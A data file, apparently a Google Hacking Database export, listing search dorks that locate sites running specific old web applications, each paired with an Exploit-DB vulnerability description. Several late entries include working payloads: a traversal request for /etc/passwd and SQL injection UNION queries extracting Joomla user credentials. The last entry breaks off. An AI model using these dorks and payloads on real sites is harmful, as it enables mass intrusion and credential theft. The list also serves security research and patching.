{"dork": "inurl:\"com_surveymanager\"", "description": "Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: https://www.exploit-db.com/exploits/9721"}, {"dork": "Powered by PHP F1 (Max's Image Uploader)", "description": "Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: https://www.exploit-db.com/exploits/11169"}, {"dork": "inurl:\"?option=com_bsadv\"", "description": "Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: https://www.exploit-db.com/exploits/8779"}, {"dork": "\"Powered by PHP Live! v3.3\"", "description": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: https://www.exploit-db.com/exploits/9578"}, {"dork": "insite: SmarterMail Enterprise 7.1", "description": "SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: https://www.exploit-db.com/exploits/15048"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: https://www.exploit-db.com/exploits/8844"}, {"dork": "\"Copyright KerviNet\"", "description": "KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: https://www.exploit-db.com/exploits/9068"}, {"dork": "allinurl:option=com_rsmonials", "description": "Joomla Component rsmonials Remote Cross Site Scripting: https://www.exploit-db.com/exploits/8517"}, {"dork": "\"Powered by F3Site\"", "description": "F3Site 2.1 Remote Code Execution - CVE: 2007-0763: https://www.exploit-db.com/exploits/3255"}, {"dork": "\"Powered by ProjectCMS\"", "description": "ProjectCMS 1.1b Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8608"}, {"dork": "\"Powered by PunBB\"", "description": "PunBB Extension Attachment 1.0.2 SQL Injection: https://www.exploit-db.com/exploits/9849"}, {"dork": "\"Developed by rbk\"", "description": "InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: https://www.exploit-db.com/exploits/8558"}, {"dork": "Powered by Elvin Bug Tracking Server.", "description": "Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: https://www.exploit-db.com/exploits/8953"}, {"dork": "Powered By PHPFanBase", "description": "PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2957"}, {"dork": "\"Powered by wpQuiz\"", "description": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: https://www.exploit-db.com/exploits/4668"}, {"dork": "inurl:\"com_ezine\"", "description": "Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability - CVE: 2009-4094: https://www.exploit-db.com/exploits/10178"}, {"dork": "\"Powered by ClanTiger\"", "description": "ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8472"}, {"dork": "\"Power by:RichStrong CMS\"", "description": "RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: https://www.exploit-db.com/exploits/4910"}, {"dork": "powered:powered by CMS", "description": "TinyMCE WYSIWYG Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11358"}, {"dork": "\"Powered by Grayscale Blog\"", "description": "Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: https://www.exploit-db.com/exploits/3447"}, {"dork": "Powered by UCenter 1.5.0 \u00a9 2001 - 2008 Comsenz Inc.", "description": "Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: https://www.exploit-db.com/exploits/12455"}, {"dork": "inurl:roschedule.php", "description": "phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: https://www.exploit-db.com/exploits/6646"}, {"dork": "\"PHP Project Management 0.8.10\"", "description": "PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: https://www.exploit-db.com/exploits/4549"}, {"dork": "inurl:com_seyret", "description": "Joomla Seyret Video Component (com_seyret) Blind SQL Injection: https://www.exploit-db.com/exploits/14172"}, {"dork": "\"download this free gallery at matteobinda.com\"", "description": "ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: https://www.exploit-db.com/exploits/4900"}, {"dork": "Nwahy.com 2.1 , inurl:'add-site.html'", "description": "Nwahy Dir 2.1 Arbitrary Change Admin Password: https://www.exploit-db.com/exploits/9087"}, {"dork": "inurl:index.php?option=com_jombib", "description": "Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: https://www.exploit-db.com/exploits/4310"}, {"dork": "\"nukeai beta3\"", "description": "PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: https://www.exploit-db.com/exploits/2843"}, {"dork": "\"Powered by UPB\"", "description": "Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: https://www.exploit-db.com/exploits/2999"}, {"dork": "intitle:\"owl intranet * owl\" 0.82", "description": "OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: https://www.exploit-db.com/exploits/1561"}, {"dork": "Copyright 2006-2009 Insane Visions", "description": "AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10249"}, {"dork": "\"powered by JAMM\"", "description": "JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: https://www.exploit-db.com/exploits/5789"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: https://www.exploit-db.com/exploits/8738"}, {"dork": "intext:\"Powered by Lore 1.5.6\"", "description": "re 1.5.6 (article.php) Blind SQL Injection: https://www.exploit-db.com/exploits/7896"}, {"dork": "\"powered by jmdcms.com\"", "description": "JMD-CMS Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/15044"}, {"dork": "\"Driven by DokuWiki\"", "description": "DokuWiki 2006-03-09b (dwpage.php) System Disclosure: https://www.exploit-db.com/exploits/2322"}, {"dork": "intext:\"Powered by Pc4Uploader v9.0\"", "description": "Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: https://www.exploit-db.com/exploits/8709"}, {"dork": "\"copyright 2006 Broadband Mechanics\"", "description": "PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: https://www.exploit-db.com/exploits/4551"}, {"dork": "\"powered by shutter v0.1.1\"", "description": "Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: https://www.exploit-db.com/exploits/8679"}, {"dork": "\"Powered by PHP Director 0.2\"", "description": "PHP Director 0.21 (sql into outfile) eval() Injection: https://www.exploit-db.com/exploits/8181"}, {"dork": "intitle:phpinfo intext:\"php version\" +windows", "description": "PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: https://www.exploit-db.com/exploits/4553"}, {"dork": "\"S-CMS by matteoiamma\"", "description": "S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8914"}, {"dork": "inurl:\"modules/articles/index.php?cat_id=\"", "description": "XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: https://www.exploit-db.com/exploits/3594"}, {"dork": "\"by Pivot - 1.40.5\" +'Dreadwind' -pivotlog.net", "description": "Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: https://www.exploit-db.com/exploits/5973"}, {"dork": "\"PHP Easy Downloader\"", "description": "PHP Easy Downloader 1.5 (save.php) Remote Code Execution: https://www.exploit-db.com/exploits/2812"}, {"dork": "\"Powered by LoudBlog\"", "description": "LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: https://www.exploit-db.com/exploits/2050"}, {"dork": "\"Powered by visinia\"", "description": "Visinia 1.3 Multiple Vulnerabilities - https://www.exploit-db.com/exploits/14879"}, {"dork": "\"Splatt Forum\u00a9\"", "description": "PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: https://www.exploit-db.com/exploits/3518"}, {"dork": "\"Powered by Seditio\"", "description": "Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: https://www.exploit-db.com/exploits/4678"}, {"dork": "aspWebLinks 2.0", "description": "aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: https://www.exploit-db.com/exploits/1859"}, {"dork": "inurl:/webquest/soporte_derecha_w.php?", "description": "PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: https://www.exploit-db.com/exploits/4407"}, {"dork": "intext:\"Powered by pppblog\"", "description": "pppBlog 0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: https://www.exploit-db.com/exploits/1853"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: https://www.exploit-db.com/exploits/8739"}, {"dork": "\"Powered by Leap\"", "description": "Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: https://www.exploit-db.com/exploits/8577"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: https://www.exploit-db.com/exploits/8587"}, {"dork": "inurl:sysinfo.cgi ext:cgi", "description": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: https://www.exploit-db.com/exploits/1677"}, {"dork": "\"Powered by Burning Board\" -exploit -johnny", "description": "Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: https://www.exploit-db.com/exploits/3262"}, {"dork": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "description": "Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: https://www.exploit-db.com/exploits/2391"}, {"dork": "\"Powered by PMOS Help Desk\"", "description": "PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: https://www.exploit-db.com/exploits/4789"}, {"dork": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "description": "RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: https://www.exploit-db.com/exploits/2328"}, {"dork": "Site powered By Limbo CMS", "description": "Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: https://www.exploit-db.com/exploits/5088"}, {"dork": "inurl:naviid + inurl:liste9", "description": "Aiyoota! CMS - Blind SQL Injection: https://www.exploit-db.com/exploits/7490"}, {"dork": "\"POWERED BY PHPNUKE.IR\"", "description": "PHPnuke 8.2 Remote Upload File: https://www.exploit-db.com/exploits/14058"}, {"dork": "inurl:\"com_gcalendar\"", "description": "Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: https://www.exploit-db.com/exploits/10232"}, {"dork": "Powered by WikyBlog", "description": "WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: https://www.exploit-db.com/exploits/11560"}, {"dork": "\"powered by yourtube\"", "description": "YourTube 2.0 Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/9073"}, {"dork": "FhImage, powered by Flash-here.com", "description": "Fhimage 1.2.1 Remote Index Change: https://www.exploit-db.com/exploits/7820"}, {"dork": "\"Powered by: Arab Portal v2\"", "description": "Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: https://www.exploit-db.com/exploits/9320"}, {"dork": "\"Powered by PHP iCalendar\"", "description": "PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: https://www.exploit-db.com/exploits/6519"}, {"dork": "POWERED BY ALITALK", "description": "ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: https://www.exploit-db.com/exploits/4922"}, {"dork": "Copyright 2010. Software Index", "description": "Software Index (Remote File Upload) Exploit: https://www.exploit-db.com/exploits/13999"}, {"dork": "\"Powered by MDForum\"", "description": "MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: https://www.exploit-db.com/exploits/3057"}, {"dork": "\"Powered by mojoPortal\"", "description": "mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: https://www.exploit-db.com/exploits/15018"}, {"dork": "intitle:\"login to cacti\"", "description": "Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: https://www.exploit-db.com/exploits/3045"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8778"}, {"dork": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "description": "PHP Advanced Transfer Manager 1.30 Source Code Disclosure: https://www.exploit-db.com/exploits/2968"}, {"dork": "Small Business Manager", "description": "Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15313"}, {"dork": "\"Powered by webSPELL\"", "description": "webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: https://www.exploit-db.com/exploits/8453"}, {"dork": "\"Powered by IMGallery\"", "description": "IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: https://www.exploit-db.com/exploits/3049"}, {"dork": "intext:\"Powered by Plogger!\" -plogger.org", "description": "Plogger Beta 2.1 Administrative Credentials Disclosure: https://www.exploit-db.com/exploits/1621"}, {"dork": "\"Powered by FreeWebshop.org 2.2.1\"", "description": "FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: https://www.exploit-db.com/exploits/4740"}, {"dork": "\"powered by XHP CMS\"", "description": "XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: https://www.exploit-db.com/exploits/1605"}, {"dork": "Portal By vbPortal Version 3.5.0", "description": "vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: https://www.exploit-db.com/exploits/2087"}, {"dork": "\"Copyright @2007 Iatek LLC\"", "description": "PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: https://www.exploit-db.com/exploits/4848"}, {"dork": "\"& Spider Friendly by Crack\"", "description": "phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: https://www.exploit-db.com/exploits/2686"}, {"dork": "intitle:\"login to cacti\"", "description": "Cacti 0.8.6i cmd.php popen() Remote Injection: https://www.exploit-db.com/exploits/3029"}, {"dork": "Welcome to your PHPOpenChat-Installation!", "description": "ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: https://www.exploit-db.com/exploits/1652"}, {"dork": "\"powered by TSEP - The Search Engine Project\"", "description": "TSEP 0.942.02 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9057"}, {"dork": "WEBalbum 2004-2006 duda", "description": "WebAlbum 2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: https://www.exploit-db.com/exploits/1608"}, {"dork": "\"Powered by Zomplog\"", "description": "Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: https://www.exploit-db.com/exploits/4466"}, {"dork": "intext:\"Powered by simplog\"", "description": "Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: https://www.exploit-db.com/exploits/1663"}, {"dork": "\"Powered by SMF\"", "description": "Simple Machines Forum 1.1 rc2 local inclusion: https://www.exploit-db.com/exploits/2231"}, {"dork": "inurl:php-stats.js.php", "description": "Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: https://www.exploit-db.com/exploits/3502"}, {"dork": "\"Powered by MercuryBoard\"", "description": "MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: https://www.exploit-db.com/exploits/2247"}, {"dork": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "description": "Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: https://www.exploit-db.com/exploits/5391"}, {"dork": "\"Driven by DokuWiki\"", "description": "DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: https://www.exploit-db.com/exploits/2321"}, {"dork": "\"powered by php update\"", "description": "PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: https://www.exploit-db.com/exploits/3020"}, {"dork": "Realizzato utilizzando Web Portal", "description": "WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: https://www.exploit-db.com/exploits/4835"}, {"dork": "\"powered by ILIAS\"", "description": "ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: https://www.exploit-db.com/exploits/9151"}, {"dork": "\"This site is powered by CMS Made Simple\"", "description": "CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: https://www.exploit-db.com/exploits/5600"}, {"dork": "\"by eXtreme Crew\"", "description": "extreme-fusion 4.02 Remote Code Execution: https://www.exploit-db.com/exploits/2937"}, {"dork": "\"2007 Rafal Kucharski\"", "description": "RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: https://www.exploit-db.com/exploits/8648"}, {"dork": "\"This forum powered by Phorum.\"", "description": "Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: https://www.exploit-db.com/exploits/2008"}, {"dork": "\"is proudly powered by WordPress\"", "description": "Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: https://www.exploit-db.com/exploits/3109"}, {"dork": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "description": "Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: https://www.exploit-db.com/exploits/2842"}, {"dork": "FhImage, powered by Flash-here.com", "description": "Fhimage 1.2.1 Remote Command Execution: https://www.exploit-db.com/exploits/7821"}, {"dork": "\"powered by blur6ex\"", "description": "blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: https://www.exploit-db.com/exploits/1904"}, {"dork": "\"Powered by Claroline\" -demo", "description": "Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: https://www.exploit-db.com/exploits/1627"}, {"dork": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "description": "Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: https://www.exploit-db.com/exploits/2841"}, {"dork": "\"Personal .NET Portal\"", "description": "Personal.Net Portal Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15067"}, {"dork": "\"SmodBIP\" & \"Aktualno.ci\"", "description": "SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: https://www.exploit-db.com/exploits/3678"}, {"dork": "\"SmodCMS\" & \"S.ownik\"", "description": "SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: https://www.exploit-db.com/exploits/3679"}, {"dork": "\"is a product of Lussumo\"", "description": "Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: https://www.exploit-db.com/exploits/4548"}, {"dork": "inurl:\"index.php?name=PNphpBB2\"", "description": "PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: https://www.exploit-db.com/exploits/4026"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Credentials Changer SQL injection: https://www.exploit-db.com/exploits/8843"}, {"dork": "\"Powered by ClanTiger\"\t", "description": "ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: https://www.exploit-db.com/exploits/8471"}, {"dork": "inurl:/modules/lykos_reviews/", "description": "XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: https://www.exploit-db.com/exploits/3618"}, {"dork": "\"Powered By X7 Chat\"", "description": "X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: https://www.exploit-db.com/exploits/2068"}, {"dork": "\"powered by guestbook script\"", "description": "GuestBook Script 1.7 (include_files) Remote Code Execution: https://www.exploit-db.com/exploits/1575"}, {"dork": "index.php?option=com_ezine", "description": "Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: https://www.exploit-db.com/exploits/3590"}, {"dork": "inurl:/modules/xfsection/", "description": "XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3645"}, {"dork": "inurl:\"phpwcms/index.php?id=\"", "description": "phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: https://www.exploit-db.com/exploits/2758"}, {"dork": "\"Copyright Devellion Limited 2005. All rights reserved.\"", "description": "CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: https://www.exploit-db.com/exploits/2198"}, {"dork": "inurl:/modules/debaser/", "description": "XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: https://www.exploit-db.com/exploits/3630"}, {"dork": "\"Powered by Quick.Cms\"", "description": "Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: https://www.exploit-db.com/exploits/2719"}, {"dork": "inurl:/modules/rmgallery/", "description": "XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: https://www.exploit-db.com/exploits/3633"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\"", "description": "phpMyChat 0.14.5 (SYS enter) Remote Code Execution: https://www.exploit-db.com/exploits/1646"}, {"dork": "\"Basado en Spirate\"", "description": "Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: https://www.exploit-db.com/exploits/8819"}, {"dork": "\"Barbecued by sNews\"", "description": "sNews 1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: https://www.exploit-db.com/exploits/3116"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Blind SQL Injection: https://www.exploit-db.com/exploits/8740"}, {"dork": "\"powered by discuz!", "description": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure: https://www.exploit-db.com/exploits/2859"}, {"dork": "\"This web site was made with PostNuke\"", "description": "PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: https://www.exploit-db.com/exploits/2707"}, {"dork": "\"Powered by Shop-Script FREE\"", "description": "Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: https://www.exploit-db.com/exploits/4419/"}, {"dork": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "description": "LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: https://www.exploit-db.com/exploits/4242/"}, {"dork": "\"powered by Quick.Cart\"", "description": "Quick.Cart 2.0 (actions_client/gallery.php) Local File Include: \nhttps://www.exploit-db.com/exploits/2769"}, {"dork": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "description": "PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879: \nhttps://www.exploit-db.com/exploits/3017"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "phpMyChat 0.15.0dev (SYS enter) Remote Code Execution: \nhttps://www.exploit-db.com/exploits/1647"}, {"dork": "\"Powered by MercuryBoard\"", "description": "MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632: \nhttps://www.exploit-db.com/exploits/5653"}, {"dork": "\"Powered by Coppermine Photo Gallery\"", "description": "Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481: \nhttps://www.exploit-db.com/exploits/6178"}, {"dork": "\"Content managed by the Etomite Content Management System\"", "description": "Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904: \nhttps://www.exploit-db.com/exploits/2071"}, {"dork": "\"powered by PCPIN.com\"", "description": "PCPIN Chat 5.0.4 (login/language) Remote Code Execution: \nhttps://www.exploit-db.com/exploits/1697"}, {"dork": "\"Powered by Leap\"", "description": "Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613: \nhttps://www.exploit-db.com/exploits/8576"}, {"dork": "inurl:\"option=com_tophotelmodule\"", "description": "CVE: 2009-3368\nEDB-ID:\nThis search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities"}, {"dork": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "description": "RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539: \nhttps://www.exploit-db.com/exploits/3850"}, {"dork": "\"Powered by eXV2 Vers\"", "description": "exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080: \nhttps://www.exploit-db.com/exploits/2415"}, {"dork": "\"Betrieben mit Serendipity 1.0.3\"", "description": "Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242: \nhttps://www.exploit-db.com/exploits/2869"}, {"dork": "\"Powered by XMB\"", "description": "XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191: \nhttps://www.exploit-db.com/exploits/2178"}, {"dork": "\"Powered by BIGACE 2.5\"", "description": "BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778: \nhttps://www.exploit-db.com/exploits/8664"}, {"dork": "allintitle: powered by DeluxeBB", "description": "DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195: \nhttps://www.exploit-db.com/exploits/5550"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598: \nhttps://www.exploit-db.com/exploits/8854"}, {"dork": "\"Powered by ClanTiger\"", "description": "ClanTiger 1.1.1 (slug) Blind SQL Injection: https://www.exploit-db.com/exploits/8473"}, {"dork": "\"AlumniServer project\"", "description": "AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection: https://www.exploit-db.com/exploits/9020"}, {"dork": "inurl:imageview5", "description": "Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554: \nhttps://www.exploit-db.com/exploits/2647"}, {"dork": "\"This site is powered by e107\"", "description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttps://www.exploit-db.com/exploits/2711"}, {"dork": "\"powered by tikiwiki\"", "description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttps://www.exploit-db.com/exploits/2288"}, {"dork": "\"powered by gcards\"", "description": "gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346: \nhttps://www.exploit-db.com/exploits/1595"}, {"dork": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "description": "Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889: \nhttps://www.exploit-db.com/exploits/1868"}, {"dork": "\"This web site was made with MD-Pro\"", "description": "CVE: 2006-7112\nEDB-ID: 2712\nThis search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP."}, {"dork": "http://www.google.com/search?q=\"Powered+by+XMB\"", "description": "CVE: 2006-3994\nEDB-ID: 2105\nThis search can potentially identify vulnerable installations of XMB"}, {"dork": "\"powered by ThWboard\"", "description": "CVE: 2007-0340\nEDB-ID: 3124\nThis search can potentially identify vulnerable installations of ThWboard."}, {"dork": "\"Page created in\" \"seconds by glFusion\" +RSS", "description": "CVE: 2009-1281\nEDB-ID: 8347\nThis search can potentially identify vulnerable installations of glFusion.\nhttps://www.exploit-db.com/exploits/8347"}, {"dork": "inurl:wp-login.php Register Username Password -echo", "description": "CVE: 2006-2667\nEDB-ID: 6\nThis search can potentially identify vulnerable installations of WordPress."}, {"dork": "\"this site is using the webspell script (version: 4.01.02)\"", "description": "CVE: 2007-0502\nEDB-ID: 3172\nThis search can potentially identify vulnerable installations of webSPELL 4.01.02"}, {"dork": "inurl:\"com_sqlreport\"", "description": "Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753: https://www.exploit-db.com/exploits/11549"}, {"dork": "\"Powered by Quick.Cart\"", "description": "Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138: https://www.exploit-db.com/exploits/4025"}, {"dork": "\"Powered by Shadowed Portal\"", "description": "Shadowed Portal 5.7d3 Remote Command Execution Exploit: https://www.exploit-db.com/exploits/4768"}, {"dork": "\"powered by bitweaver\"", "description": "bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105: https://www.exploit-db.com/exploits/1918"}, {"dork": "inurl:\"index.php?ind=blog\"", "description": "MKPortal 1.2.1 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7796/"}, {"dork": "\"Site produced by GeneralProducts.co.uk\"", "description": "GeneralProducts (index.php?page=) Local File Inclusion Vulnerability\nhttp://server/index.php?page=../../../../../../etc/passwd\nNet.Edit0r - black.hat.tm@gmail.com"}, {"dork": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "description": "Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability Author: altbta"}, {"dork": "\"Powered by SiteEngine\"", "description": "SiteEngine 7.1 SQL injection Vulnerability: https://www.exploit-db.com/exploits/15612"}, {"dork": "inurl:\"index.php?option=com_competitions\"", "description": "SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&menu=XroGuE Author: Ashiyane Digital Security Team"}, {"dork": "inurl:\"index.php?option=com_storedirectory\"", "description": "SQL Injection Vulnerability: http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users \nAuthor: Ashiyane Digital Security Team"}, {"dork": "inurl:\"index.php?option=com_catalogue\"", "description": "Author: Ashiyane Digital Security Team SQL Injection: 